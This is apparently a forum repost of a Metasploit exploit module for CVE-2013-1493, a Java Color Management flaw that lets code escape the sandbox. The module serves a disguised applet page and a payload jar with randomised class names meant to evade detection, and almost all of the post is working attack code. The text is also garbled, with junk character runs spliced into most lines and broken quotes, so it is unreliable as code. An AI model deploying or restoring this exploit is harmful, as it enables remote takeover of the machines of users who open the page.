##- x$ j; ^; T3 i6 K0 Q5 M
. s2 ?2 h. n: e8 X8 @ |8 ~; D3 v# This file is part of the Metasploit Framework and may be subject to1 R# s: {. ?0 T. G _" w
# redistribution and commercial restrictions. Please see the Metasploit; M" E6 i! x" X6 ]8 {
# web site for more information on licensing and terms of use.# T' r3 {2 P7 ~# T f' ?
# http://metasploit.com/
7 B9 z, ?' y5 Y##
6 e8 K: P6 v. [require ‘msf/core’% }- W p: i& u" D$ |
require ‘rex’
2 X% h" H: h; o& a, U8 j* Qclass Metasploit3 < Msf::Exploit::Remote4 i; B# u$ J9 h' Q2 U; \7 @
Rank = NormalRanking/ i/ m4 ~8 T% T- x: w: r) d5 [3 C% J
include Msf::Exploit::Remote::HttpServer::HTML
; e5 m# x" {% M1 r6 f. O, ninclude Msf::Exploit::EXE8 K% L* b. `: n- i. ^* o2 {4 L
include Msf::Exploit::Remote::BrowserAutopwn
6 Y* _" a: I0 ? T$ ?autopwn_info({ :javascript => false })+ H5 D+ l% {3 _! p) a5 l
def initialize( info = {} )
1 R4 s4 H4 ]3 U4 Gsuper( update_info( info,9 A3 |. i& o6 }& S
‘Name’ => ‘Java CMM Remote Code Execution’,: C- i- s8 Y, b+ J4 r, `1 m
‘Description’ => %q{
; ^& j M; h9 w m+ ]7 h5 U) S# JThis module abuses the Color Management classes from a Java Applet to run
# b$ Q8 l6 ~! E" F& u. V7 Yarbitrary Java code outside of the sandbox as exploited in the wild in February+ ?% A, m7 M+ O* p
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
+ f: Y& d" k9 S# H" pand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1+ P" b, G- G2 d' q
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
8 j+ }) F. S5 ~; i+ { lwarning in order to run the malicious applet.
7 B! V$ v/ @# ]* {- t$ h},
P/ T9 ~- I3 L‘License’ => MSF_LICENSE,
; p& e0 }, }/ {$ X% p* d3 I0 \' s‘Author’ =>0 E Z1 g4 |4 G) z
'Unknown', # Vulnerability discovery and Exploit' x" l7 t( F! z8 e
'juan vazquez' # Metasploit module (just ported the published exploit)! L m4 C3 A0 \7 t: `% z0 e
],
1 J4 P/ U. h- Z( _‘References’ =>
+ E! A% X- E6 }2 j# \/ z[6 o$ Z* w7 q' D/ Y& H' |
[ 'CVE', '2013-1493' ],
1 Z: I% G& G+ B: ^ B% ?) g& _[ 'OSVDB', '90737' ],
( \0 H1 r) ]! J* P+ ~[ 'BID', '58238' ],$ {) |8 o+ D' V2 D4 v+ D$ v! N
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],8 z5 F' w9 p6 Q$ @; |9 P/ o# N& [5 h% ~
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
4 p2 W5 y5 P+ f7 e0 W Z8 F: N[ 'URL', 'http://pastie.org/pastes/6581034' ]
9 V/ Z2 u( a! o q, U$ l! M],
. x- L" A( I; a# D V% n‘Platform’ => [ 'win', 'java' ],3 p$ u, U5 d! @ `, ]
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
7 m" z7 ^2 q5 {) ]1 J0 e‘Targets’ =>
+ F- O2 M% ]+ m. L2 Z- I" |5 P8 j+ j7 S[5 ~8 g) _7 d. u% L
[ 'Generic (Java Payload)',
8 o2 e! b: E: e6 [. Y# A{7 m$ r8 `, c Q1 k* ^
'Platform' => 'java',
4 T( l' K( P' G( e" \/ ^! S'Arch' => ARCH_JAVA
0 {. L$ V; [5 G l) a1 S}
* W8 f' P1 E7 D3 \7 U],
B( e$ U( [" v- a# x' o[ 'Windows x86 (Native Payload)',) H; A; ]+ @3 z) l
{4 L8 n* c I$ q* Y
'Platform' => 'win',
4 C7 E2 e5 I0 A- ^3 F'Arch' => ARCH_X86
7 ?6 Z, q2 F( m+ Q \. k( P. K}
2 s+ P( P* [1 O5 Y& c]
" C0 j+ \4 H& F, B; _, P1 z],( v2 ^( ]7 C, E' Q
‘‘DisclosureDate’ => ‘Mar 01 2013′
# l8 M5 U+ E3 r% b))
: j) w3 H' `4 @end
) `* d& d3 z6 M9 p& n1 v/ Ndef setup
' Q" c3 `( R2 ?8 m9 l( S. qpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)0 F4 X b7 k2 \
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }5 t9 O4 p p- \, @* m: G
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
5 k0 A5 d/ O, t! S% u@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }5 Q+ N% X4 [. e4 S5 O( e. h
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
6 c4 ^: L+ b5 }( e@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
8 m$ s/ b# Z0 ]/ g2 w; [path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
* `* B+ h9 V6 ]+ F3 r4 P@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
# A$ G; ~& C& n' b5 I9 S@init_class_name = rand_text_alpha(“Init”.length)
: D: y$ ?& f" X0 ?; z/ d! A, l@init_class.gsub!(“Init”, @init_class_name)+ Z# Z' Q+ Z( A9 V
super; G- M6 u0 |) ?3 Y. X7 {& h- ^
end' o; S9 A1 E0 N3 @
def on_request_uri(cli, request)9 g5 ]" U( C) C: {& Q' @
print_status(“handling request for #{request.uri}”)
* `! q$ \7 [" n9 |case request.uri
! U7 d' f; b' n% T) g6 {" z8 i, m. ewhen /\.jar$/i
' ?' W: w! J& g3 ejar = payload.encoded_jar' L3 J5 ?5 a6 ~! U
jar.add_file(“#{@init_class_name}.class”, @init_class)
2 q9 U$ z2 `" F+ u& z& Y5 Kjar.add_file(“Leak.class”, @leak_class)
J& V1 u9 l/ v" Cjar.add_file(“MyBufferedImage.class”, @buffered_image_class)
' E& [' H" h! {/ T" j3 D5 m& ljar.add_file(“MyColorSpace.class”, @color_space_class)
/ ^5 `* O- | t5 R; ~, z& @7 O. IDefaultTarget’ => 1,' Z5 ^& ?" K w7 W( I# p% E- {
metasploit_str = rand_text_alpha(“metasploit”.length)
% D% [( d6 Y' p' s) K8 ypayload_str = rand_text_alpha(“payload”.length)
4 G4 V- D3 Z0 [jar.entries.each { |entry|8 O/ P0 o8 ]5 s
entry.name.gsub!(“metasploit”, metasploit_str)! U7 e/ K/ M' q
entry.name.gsub!(“Payload”, payload_str)
% P3 R1 t+ A1 G5 Ventry.data = entry.data.gsub(“metasploit”, metasploit_str)
4 J( k! p3 Z6 l8 x' c. w2 dentry.data = entry.data.gsub(“Payload”, payload_str)( ]5 |( p. t& z4 D2 B3 g0 g
}
) l: L. L! L# g, gjar.build_manifest' m. N, G" U* H6 \3 ^
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
2 O' p- C9 w3 Gwhen /\/$/
. x9 g1 B ^" J8 O, p+ ~+ ?payload = regenerate_payload(cli)1 a; R0 w# E& M: U" X1 K
if not payload, ~) k) l" ^9 ~1 S
print_error(“Failed to generate the payload.”)4 k( V) h" g$ D1 E( |
send_not_found(cli)
7 k5 r3 N4 W, f; b* yreturn4 u4 F( M8 b+ }& o2 u3 o
end
5 {6 L0 H0 H2 v2 Ksend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })+ v; Y: A6 {; [) ^- |
else
+ f' N5 G% ?( o$ N7 A5 L( H1 l3 ]) Isend_redirect(cli, get_resource() + ‘/’, ”)( l; c$ m& O0 Y5 @
end5 ^' w' `% V; W2 A& n u7 c7 l
end
: h z1 m$ z$ i7 g# P: t# Bdef generate_html
; _: s' ?" [% g- {. _html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
/ Z7 y( ^3 e0 o# W0 N! A! vhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
5 F& m* x6 `, Q- l3 h% ohtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|; v2 ?8 g& b+ C' ^" _6 {
html += %Q|</applet></body></html>|
/ K! e4 V- }0 Z! e1 {return html
* [& m! H% k, U6 Wend+ n4 \; g2 n6 V3 Y
end
0 s/ P- k4 b4 o1 T3 a/ uend
; [; w& q/ F6 S$ Y% }2 k, |. b |
发表于 2013-4-4 17:31:17
收藏
支持
反对